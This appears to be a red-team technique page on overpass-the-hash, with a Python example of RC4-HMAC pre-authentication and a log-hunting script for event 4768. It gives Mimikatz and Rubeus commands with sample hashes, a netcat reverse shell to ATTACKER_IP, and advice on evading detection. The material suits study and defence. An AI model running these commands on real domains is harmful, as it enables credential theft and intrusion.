Overpass-the-hash uses a dumped NTLM hash to request a Kerberos TGT (and, from it, service tickets), granting the attacker Kerberos-authenticated access to other domain-joined machines and services. See also pass-the-key, of which overpass-the-hash is the RC4-specific case: with RC4-HMAC (etype 23) the NTLM hash is the Kerberos long-term key, so the password itself is never needed.

Requirements

  • The user's credential material must be cached on the compromised host (in LSASS) for it to be dumpable; an NTLM hash obtained elsewhere (SAM, NTDS.dit) works just as well for the Kerberos request.
  • Local administrator rights (SYSTEM or SeDebugPrivilege) are needed to read LSASS and dump the hash.
  • The KDC and the target account must still accept RC4-HMAC (etype 23). If RC4 has been disabled, the AES key is required instead (see pass-the-key).

The captured NTLM hash is used directly as the RC4-HMAC encryption key (Kerberos etype 23) when authenticating to the KDC: the AS-REQ pre-authentication timestamp is encrypted with it, and the KDC issues a TGT without the attacker ever knowing the password.
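To make that concrete, here is an added example (not code from the page or from Mimikatz/Rubeus) implementing RC4-HMAC as specified in RFC 4757 with a raw NT hash as the key, the way the PA-ENC-TIMESTAMP of an AS-REQ is protected. The NT hash below is the well-known hash of the string "password" and the timestamp is a constructed sample; the DER/ASN.1 wrapping of the real PA-ENC-TS-ENC structure is deliberately left out, so the plaintext here is just the KerberosTime string.

```python
"""Added example: why the NT hash alone suffices for overpass-the-hash.

RC4-HMAC (Kerberos etype 23, RFC 4757) keys the cipher with the NT hash
itself, so whoever holds the hash can build a valid AS-REQ pre-auth blob.
Stdlib only; all inputs are constructed samples.
"""
import hashlib
import hmac
import os
import struct
from typing import Optional

# NT hash of "password" = MD4(UTF-16LE("password")). Constructed sample key.
SAMPLE_NT_HASH = bytes.fromhex("8846f7eaee8fb117ad06bdd830b7586c")

# Key-usage number for the AS-REQ PA-ENC-TIMESTAMP (RFC 4120 section 7.5.1).
USAGE_AS_REQ_PA_ENC_TIMESTAMP = 1


def nt_hash(password: str) -> bytes:
    """MD4 over UTF-16LE. Needs an OpenSSL build that still exposes MD4 (the
    legacy provider); where it is missing, dump the hash instead, which is
    what the attack assumes anyway. Not called by the demo below."""
    return hashlib.new("md4", password.encode("utf-16le")).digest()


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4: key scheduling followed by keystream XOR."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def _hmac_md5(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.md5).digest()


def rc4_hmac_encrypt(nt_hash_key: bytes, usage: int, plaintext: bytes,
                     confounder: Optional[bytes] = None) -> bytes:
    """RFC 4757 encrypt: returns checksum || RC4(K3, confounder || plaintext).
    K is the NT hash; T is the usage number as a 4-byte little-endian int."""
    k1 = _hmac_md5(nt_hash_key, struct.pack("<I", usage))
    k2 = k1                                   # K2 = K1 for non-export RC4-HMAC
    confounder = os.urandom(8) if confounder is None else confounder
    data = confounder + plaintext
    checksum = _hmac_md5(k2, data)            # HMAC-MD5 over confounder || plaintext
    k3 = _hmac_md5(k1, checksum)              # per-message RC4 key
    return checksum + rc4(k3, data)


def rc4_hmac_decrypt(nt_hash_key: bytes, usage: int, blob: bytes) -> bytes:
    """Inverse of rc4_hmac_encrypt. Raises ValueError on checksum mismatch
    (wrong key, wrong usage number, or tampered ciphertext), which is exactly
    how a KDC rejects pre-auth built from the wrong hash."""
    if len(blob) < 16 + 8:
        raise ValueError("blob too short for checksum + confounder")
    checksum, ciphertext = blob[:16], blob[16:]
    k1 = _hmac_md5(nt_hash_key, struct.pack("<I", usage))
    k3 = _hmac_md5(k1, checksum)
    data = rc4(k3, ciphertext)
    if not hmac.compare_digest(_hmac_md5(k1, data), checksum):
        raise ValueError("RC4-HMAC checksum mismatch")
    return data[8:]                           # drop the 8-byte confounder


def build_pa_enc_timestamp(nt_hash_key: bytes, kerberos_time: str) -> bytes:
    """Encrypt a KerberosTime the way the AS-REQ pre-auth carries it.
    Simplification: the PA-ENC-TS-ENC ASN.1 wrapper is omitted."""
    return rc4_hmac_encrypt(nt_hash_key, USAGE_AS_REQ_PA_ENC_TIMESTAMP,
                            kerberos_time.encode("ascii"))


if __name__ == "__main__":
    blob = build_pa_enc_timestamp(SAMPLE_NT_HASH, "20240101120000Z")
    print("PA-ENC-TIMESTAMP blob:", blob.hex())
    print("KDC-side decrypt     :", rc4_hmac_decrypt(SAMPLE_NT_HASH, 1, blob))
```

The decrypt side is the KDC's view: with the right hash the checksum verifies and the timestamp comes out, with any other key it fails, which is why a stolen NT hash is as good as the password for etype 23. AES etypes derive their keys with PBKDF2 over the password and a salt (realm plus username), so the NT hash cannot be turned into an AES key; that is the practical difference between overpass-the-hash and pass-the-key with /aes256.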

Example

Both methods are noticeable in logs, so pick your poison.

Mimikatz

  • Use Mimikatz sekurlsa::pth (after privilege::debug) to spawn a process whose logon session carries the compromised domain user's NTLM hash; here the process is a netcat reverse shell rather than PowerShell:
sekurlsa::pth /user:Administrator /domain:za.tryhackme.com /rc4:96ea24eff4dff1fbe13818fbf12ea7d8 /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 5556"

Mimikatz opens a handle to LSASS to patch the new logon session's credentials, which EDR and Sysmon ProcessAccess (event 10) monitoring may flag as suspicious.

  • From that process, do anything that requires Kerberos authentication so that a TGT is requested with the injected hash (e.g., net use \\dc01 to connect to a share on the DC). The KDC logs this as an RC4 ticket request (event 4768, encryption type 0x17).
  • Launch a remote shell with PsExec.exe (Sysinternals) on dc01: .\PsExec.exe \\dc01 cmd.exe. Using the hostname or FQDN is mandatory, since targeting an IP address makes Windows fall back to NTLM authentication instead of Kerberos.

Rubeus

  • Cobalt Strike beacon & Rubeus with the RC4/NTLM hash: beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:jking /ntlm:59fc0f884922b4ce376051134c71e22c /nowrap
    • alternatively use the AES256 key (pass-the-key): beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:jking /aes256:4a8a74daad837ae09e9ecc8c2f1b89f960188cb934db6d4bbebade8318ae57c6 /nowrap
    • use the /opsec switch so the request resembles a real Windows client: it sets the KDC options to 0x40810010 (canonicalize set) instead of Rubeus's default 0x40800010. It is meant to be combined with /aes256, since a current Windows client would request AES.
  • Without /ptt, asktgt only prints the base64 ticket (/nowrap keeps it on one line). Add /ptt to import it into the current logon session, or create a sacrificial logon session with Rubeus createnetonly and target it with /luid, then follow the same steps as in the previous section.

RC4-HMAC is a legacy ticket encryption type (event 4768 shows TicketEncryptionType 0x17), so in a domain where clients normally request AES it is much more likely to be noticed; an AES256 request made with /opsec blends into ordinary ticket traffic.
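The following added example (not code from the page or from any of the tools above) turns the two log signals discussed here into a small hunt over 4768 events: an RC4-HMAC TGT (0x17) and KDC options that differ from the 0x40810010 a real Windows client sends. The event records are constructed samples in the shape of 4768 EventData, with the domain name from the Mimikatz command above; the IP addresses, timestamps and the WS01$ account are invented for the sample.

```python
"""Added example: hunting overpass-the-hash in Security log event 4768.

Signals: (1) TGT issued with RC4-HMAC (TicketEncryptionType 0x17) where clients
normally request AES; (2) KDC options other than the 0x40810010 of a real
Windows client (Rubeus without /opsec sends 0x40800010). Stdlib only; the
records below are constructed samples, not real log data.
"""
import xml.etree.ElementTree as ET

RC4_HMAC = 0x17                            # etype 23
WINDOWS_CLIENT_KDC_OPTIONS = 0x40810010    # forwardable|renewable|canonicalize|renewable-ok


def _sample_4768(time, user, ip, options, etype, status="0x0"):
    """Build one constructed 4768 record. Real exports (Get-WinEvent ... ToXml())
    carry the xmlns http://schemas.microsoft.com/win/2004/08/events/event; strip
    it or prefix the tag names used by the parser with {that-namespace}."""
    return (f'<Event><System><EventID>4768</EventID><TimeCreated SystemTime="{time}"/></System>'
            f'<EventData><Data Name="TargetUserName">{user}</Data>'
            f'<Data Name="TargetDomainName">ZA.TRYHACKME.COM</Data>'
            f'<Data Name="IpAddress">{ip}</Data><Data Name="TicketOptions">{options}</Data>'
            f'<Data Name="Status">{status}</Data><Data Name="TicketEncryptionType">{etype}</Data>'
            f'<Data Name="PreAuthType">2</Data></EventData></Event>')


SAMPLE_4768_EVENTS = "<Events>\n" + "\n".join([
    _sample_4768("2024-01-01T12:00:01Z", "jking", "::ffff:10.10.14.5", "0x40800010", "0x17"),          # Rubeus /ntlm, no /opsec
    _sample_4768("2024-01-01T12:00:07Z", "jking", "::ffff:10.10.14.5", "0x40800010", "0x12"),          # Rubeus /aes256, no /opsec
    _sample_4768("2024-01-01T12:00:15Z", "jking", "::ffff:10.10.14.5", "0x40810010", "0x12"),          # Rubeus /aes256 /opsec or a real client
    _sample_4768("2024-01-01T12:01:02Z", "Administrator", "::ffff:10.10.14.9", "0x40810010", "0x17"),  # mimikatz pth: real client, RC4 key
    _sample_4768("2024-01-01T12:01:30Z", "WS01$", "::ffff:10.10.14.20", "0x40810010", "0x12"),         # ordinary workstation
    _sample_4768("2024-01-01T12:02:00Z", "jking", "::ffff:10.10.14.5", "0x40800010", "0xffffffff", status="0x6"),  # failed request
]) + "\n</Events>"


def parse_4768_events(xml_text: str) -> list:
    """Flatten the EventData of every 4768 record into a dict of field -> value."""
    events = []
    for ev in ET.fromstring(xml_text).iter("Event"):
        if ev.findtext("System/EventID") != "4768":
            continue
        fields = {d.get("Name"): (d.text or "") for d in ev.iter("Data")}
        fields["TimeCreated"] = ev.find("System/TimeCreated").get("SystemTime")
        events.append(fields)
    return events


def assess_tgt_request(ev: dict) -> list:
    """Reasons (possibly none) a successful 4768 record looks like overpass-the-hash."""
    reasons = []
    if ev.get("Status") != "0x0":
        return reasons      # failed requests are a different hunt (4771 / 4768 failure codes)
    etype = int(ev.get("TicketEncryptionType", "0x0"), 16)
    options = int(ev.get("TicketOptions", "0x0"), 16)
    if etype == RC4_HMAC:
        reasons.append("RC4-HMAC TGT (etype 0x17): NTLM hash usable as the Kerberos key")
    if options != WINDOWS_CLIENT_KDC_OPTIONS:
        reasons.append(f"KDC options {options:#010x} differ from the Windows client default "
                       f"{WINDOWS_CLIENT_KDC_OPTIONS:#010x}")
    return reasons


def find_suspicious(xml_text: str) -> list:
    """Run assess_tgt_request over every record and keep the ones with findings."""
    findings = []
    for ev in parse_4768_events(xml_text):
        reasons = assess_tgt_request(ev)
        if reasons:
            findings.append({"time": ev["TimeCreated"], "user": ev["TargetUserName"],
                             "ip": ev["IpAddress"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_suspicious(SAMPLE_4768_EVENTS):
        print(f["time"], f["user"], f["ip"], "; ".join(f["reasons"]))
```

Against the sample set this flags the plain Rubeus /ntlm request twice, the /aes256 request without /opsec once (options only), and the Mimikatz pth request once (RC4 only); the /opsec AES256 request and the workstation look identical at the KDC, which is the point the text makes: once the attacker uses AES with client-like options, the domain controller's log no longer separates them and detection has to come from the endpoint (LSASS access, sacrificial logon sessions).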